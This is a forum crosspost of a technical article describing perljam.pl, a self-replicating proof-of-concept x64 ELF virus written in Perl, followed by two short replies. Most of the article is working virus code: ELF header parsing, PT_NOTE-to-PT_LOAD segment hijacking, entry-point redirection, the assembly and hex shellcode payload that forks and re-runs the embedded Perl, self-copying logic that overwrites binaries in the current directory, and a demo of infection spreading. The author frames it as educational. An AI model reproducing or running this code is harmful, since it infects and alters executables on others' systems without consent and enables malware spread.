Perljam.pl: A Perl x64 ELF virus

[ intro ]

EHLO. This article describes the implementation of perljam.pl, a proof-of-concept x64 ELF virus written in Perl based mostly on Linux.Midrashim. The virus includes the following features and limitations:

  • It uses the PT_NOTE to PT_LOAD ELF injection technique.
  • It uses a non-destructive hardcoded payload that prints an extract from the song "release" by Pearl Jam and then infects other binaries in the current directory.
  • It works on regular and position independent binaries.
  • It is written in Perl, an interpreted language available by default on most Linux x64 distributions.
  • It does not implement any evasion or obfuscation techniques, making it trivial to detect.

(This is a crosspost from my original article at hckng. You can read it here).

Source code:

https://git.sr.ht/~hckng/vx/tree/master/item/perljam.pl
https://github.com/ilv/vx/blob/main/perljam.pl (mirror)

IMPORTANT NOTE: perljam.pl was made for educational purposes only, I'm not responsible for any misuse or damage caused by this program. Use it at your own risk.

[ part 1: infection ]

The infection is performed using the well known PT_NOTE to PT_LOAD technique which overwrites an auxiliary segment in the program headers table and converts it into a loadable segment where executable instructions can be placed without affecting program execution. This method works both on regular and position independent binaries with the exception of golang executables that use PT_NOTE segment for storing data used during execution.

The infection algorithm can be summarized as follows:

  • a) Read the binary and parse its ELF header and program headers table.
  • b) Calculate the address for loading a payload in memory.
  • c) Change binary's entry point to the previous calculated address.
  • d) Find a PT_NOTE segment and convert it to an executable PT_LOAD segment.
  • e) Adjust PT_LOAD segment's virtual address, file size and memory size.
  • f) Append payload after the binary's code.
  • g) Calculate binary's original entry point relative to the new entry point.
  • h) Append an instruction for jumping back to the binary's original entry point.
  • i) Append the virus source code at the end of the binary.

Relevant parts of the implementation will be discussed in the next sections.

[ read ELF binary and parse its headers ]

The binary is opened with the ':raw' pseudo-layer for passing binary data. Two helper subroutines are used for reading and writing content with the unpack/pack functions:

 # read & unpack
 sub ru {
     my $fh  = shift;
     my $tpl = shift;
     my $sz  = shift;

     read $fh, my $buff, $sz;
     return unpack($tpl, $buff);
 }

 # write & pack
 sub wp {
     my $fh   = shift;
     my $tpl  = shift;
     my $sz   = shift;
     my @data = @_;

     syswrite $fh, pack($tpl, @data), $sz;
 }
 [...]
 open my $fh, '<:raw', $file;

The above subroutines use a given template ($tpl) for converting data from/to the binary. In this case the following templates are used:

  • "C", an unsigned char value (1 byte).
  • "a", a string with arbitrary binary data (1 byte).
  • "x", a null byte.
  • "S", an unsigned short value (2 bytes).
  • "I", an unsigned integer value (4 bytes).
  • "q", an unsigned quad value (8 bytes).

Based on the ELF header specification, reading the binary's headers and checking the ELF magic numbers can be done as follows:

 my @ehdr = ru($fh, "C a a a C C C C C x7 S S I q q q I S S S S S S", 0x40);

 # for clarity
 my ($e_phoff, $e_phentsize, $e_phnum) = ($ehdr[13], $ehdr[17], $ehdr[18]);

 # skip non ELFs
 # $ehdr[i]  = ei_magi, 0 <= i <= 3
 if($ehdr[0] != 127 && $ehdr[1] !~ "E" && $ehdr[2] !~ "L" && $ehdr[3] !~ "F") {
      close $fh;
      next;
 }

[ calculate address and change entry point ]

According to this, the new entry point of the injected payload must be an address far beyond the end of the original program in order to avoid overlap. For simplicity, the value 0xc000000 plus the size of the binary is chosen and then the modified headers are copied into a temporary binary.

 # file size
 my $file_sz = (stat $file)[7];
 [...]
 my $far_addr = 0xc000000;
 $ne_entry = $far_addr + $file_sz;
 $oe_entry = $ehdr[12];
 $ehdr[12] = $ne_entry;

 # create tmp file for copying the modified binary
 open my $fh_tmp, '>:raw', "$file.tmp";
 wp($fh_tmp, "C a a a C C C C C x7 S S I q q q I S S S S S S", 0x40, @ehdr);

[ convert PT_NOTE to PT_LOAD and adjust values ]

Next, in order to parse the entries of the program headers table the binary is read on chuncks based on the values $e_phoff, $e_phnum and $e_phentsize obtained from the binary's ELF header. Reference for the expected headers values can be found at the Program Header specification:

 seek $fh, $e_phoff, "SEEK_SET";
 seek $fh_tmp, $e_phoff, "SEEK_SET";

 # inject the first PT_NOTE segment found
 my $found_ptnote = 0;
 for (my $i = 0; $i < $e_phnum; $i++) {
     #
     # read program header
     # see https://refspecs.linuxbase.org/elf/gabi4+/ch5.pheader.html
     my @phdr = ru($fh, "I I q q q q q q", $e_phentsize);
     [...]
     wp($fh_tmp, "I I q q q q q q", $e_phentsize, @phdr);
 }

When a segment of p_type 4 is found (PT_NOTE) the entries values are modified as follows:

  • p_type = 1 (for converting it to PT_LOAD)
  • p_flags = 5 (for making it executable)
  • p_offset = $file_sz; (offset to end of binary, where payload will be appended)
  • p_vaddr = $ne_entry (the new entry point calculated above)
  • p_filesz += payload size + 5 + virus size (payload + jmp + virus)
  • p_memsz += payload size + 5 + virus size (payload + jmp + virus)
  • p_align = 2mb (based on [x])

[ append payload ]

After parsing the entries of the program headers table, the rest of the binary is copied without change, followed by the hardcoded payload (the process of adjusting the payload will be described in part 2).

 # copy rest of file's content
 syswrite $fh_tmp, $_ while(<$fh>);

 #
 # append payload
 #
 syswrite $fh_tmp, $payload_prefix;
 [...]
 # adjust payload
 [...]
 syswrite $fh_tmp, $payload_suffix;

[ calculate relative entry point and append jump instruction ]

The binary's original entry point relative to the entry point of the injected payload is calculated using the formula described in Linux.Midrashim:

newEntryPoint = originalEntryPoint - (p_vaddr + 5) - virus_size

The jump instruction is then appended using such value:

$ne_entry = $oe_entry - ($ne_entry + 5) - $payload_sz;
# 4 bytes only
$ne_entry = $ne_entry & 0xffffffff;
wp($fh_tmp, "C q", 0x9, (0xe9, $ne_entry));

[ append virus ]

To achieve replication, perljamp.pl source code must be appended to the infected binary. To carry out this task, the virus should open itself (using the predefined variable $0) and append its content after the jump instruction. Note that if perljam.pl is executed from an infected binary then a search for the string "#!/usr/bin/perl" must be performed to ensure that only the source code of the virus is copied and not the content of the binary. The virus source code is read before the main loop and it's written on each infection.

 #
 # virus code
 #
 # search for '#!/usr/bin/perl' first to avoid copying extra data
 my $vx;
 open my $fh_vx, '<', $0;
 while(<$fh_vx>) {
    last if($_ =~ q(#!/usr/bin/perl));
 }
 $vx  = "#!/usr/bin/perl\n";
 $vx .= $_ while(<$fh_vx>);
 close $fh_vx;
 # virus size
 my $vx_sz = length($vx);

 [...]
 [...]

 #
 # append virus code
 #
 syswrite $fh_tmp, "\n".$vx;

[ overwrite binary ]

At this point the virus has created an infected copy of the binary. The final step is to delete the original binary and replace it with the infected copy.

 close $fh;
 close $fh_tmp;

 # replace original binary with tmp copy
 unlink $file;
 copy("$file.tmp", $file);
 unlink "$file.tmp";
 chmod 0755, $file;

[ part 2: payload & replication ]

The harcoded payload consists of two combined shellcodes. The first one prints to stdout an extract from the song "release" by Pearl Jam. The second one performs the virus replication by running the infected binary as a perl script. For this the perl interpreter must be executed using the -x switch, which according to Perl's documentation:

tells Perl that the program is embedded in a larger chunk of unrelated text, such as in a mail message. Leading garbage will be discarded until the first line that starts with #! and contains the string “perl”

Therefore, an execve syscall for "/usr/bin/perl -x infected_binary" will run the perljam.pl source code embedded in the infected binary. This syscall must be invoked inside a child process (fork) to prevent the interruption of the original program code.

However, the "infected_binary" (filename) argument in the execve syscall needs to change on each infection according to the binary's filename. To achieve this an initial version of the assembly code is compiled using a fixed string of length 255 (maximum filename length on Linux) as the filename argument. This string will be replaced later.

The following assembly code combines the two shellcodes mentioned before:

BITS 64
global _start
section .text
_start:
    call main
    db "i am myself, like you somehow", 0xa, 0x0
    db "/usr/bin/perl", 0x0
    db "-x", 0x0
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", 0x0
    
 main:
    ;;;;;;;;;;;;
    ; print msg
    ;;;;;;;;;;;;
    xor rax, rax
    xor rdx, rdx
    inc al
    mov rdi, rax
    pop rsi
    mov dl, 30
    syscall

    ;;;;;;;;
    ; fork
    ;;;;;;;;
    xor rax, rax
    mov rax, 57
    syscall
    test eax, eax
    jne parent

    ;;;;;;;;;;;;;;;;;;;;;;;;;
    ; call perl interpreter
    ;;;;;;;;;;;;;;;;;;;;;;;;;

    ; filename "/usr/bin/perl"
    lea rdi, [rsi+31]   
    
    ; argv
    ; ["/usr/bin/perl", "-x", "xxxxx..."] (on reverse)
    xor rdx, rdx
    push rdx
    lea rbx, [rsi+48] ; "xxx..."
    push rbx
    lea rbx, [rsi+45] ; "-x"
    push rbx
    push rdi          ; "/usr/bin/perl"
    mov rsi, rsp 

    ; execve & exit
    xor rax, rax
    mov rax, 59
    mov rdx, 0
    syscall
    xor rdx, rdx
    mov rax, 60
    syscall

 parent:
    ; cleanup for the jmp instruction
    xor rax, rax
    xor rdx, rdx

The code is then compiled to extract its hexadecimal representation.

$ nasm -f elf64 -o perljam.o perljam.s
$ objdump -d perljam.o

After this, the harcoded payload is generated by removing the hexadecimal representation of the fixed string (\x78 * 255) and then splitting the remaining shellcode in two: before and after the fixed string.

my ($payload_prefix, $payload_suffix);
$payload_prefix  = "\xe8\x30\x01\x00\x00\x69\x20\x61\x6d\x20\x6d\x79\x73\x65";
$payload_prefix .= "\x6c\x66\x2c\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x73";
$payload_prefix .= "\x6f\x6d\x65\x68\x6f\x77\x0a\x00\x2f\x75\x73\x72\x2f\x62";
$payload_prefix .= "\x69\x6e\x2f\x70\x65\x72\x6c\x00\x2d\x78\x00";

$payload_suffix  = "\x00\x48\x31\xc0\x48\x31\xd2\xfe\xc0\x48\x89\xc7\x5e\xb2";
$payload_suffix .= "\x1e\x0f\x05\x48\x31\xc0\xb8\x39\x00\x00\x00\x0f\x05\x85";
$payload_suffix .= "\xc0\x75\x2f\x48\x8d\x7e\x1f\x48\x31\xd2\x52\x48\x8d\x5e";
$payload_suffix .= "\x30\x53\x48\x8d\x5e\x2d\x53\x57\x48\x89\xe6\x48\x31\xc0";
$payload_suffix .= "\xb8\x3b\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x31";
$payload_suffix .= "\xd2\xb8\x3c\x00\x00\x00\x0f\x05\x48\x31\xc0\x48\x31\xd2";

The payload is adjusted on each infection by inserting the hexadecimal representation of the infected binary's filename plus N null bytes, where:

N = 255 - length(infected binary’s filename)

Filling with N null bytes after the infected binary's filename ensures that the payload will not crash on runtime, since adding or removing bytes will break the shellcode. In addition, the first null byte located after the infected binary's filename will be interpreted by the machine as the end of the string and the remaining null values will be ignored.

The adjustment can be done as follows:

 syswrite $fh_tmp, $payload_prefix;
 # adjust payload with target's filename
 my @chars = split //, $file;
 for(my $i = 0; $i < length($file); $i++) {
     wp($fh_tmp, "C", 0x1, (hex unpack("H2", $chars[$i])));
 } 
 # fill with null values
 for(my $i = length($file); $i < 255; $i++) {
     wp($fh_tmp, "C", 0x1, (0x00));
 }
 syswrite $fh_tmp, $payload_suffix;

[ part 3: run ]

To run:

$ perl perljam.pl

Example:

 $ cp /bin/id .
 $ ./id
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ perl perljam.pl
 $ ./id
 i am myself, like you somehow
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ cp /bin/id id2
 $ ./id2
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ ./id
 i am myself, like you somehow
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ ./id2
 i am myself, like you somehow
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
2 Likes

Very interesting, this could also theoretically be done on windows through side loading right?

1 Like

This topic was automatically closed after 121 days. New replies are no longer allowed.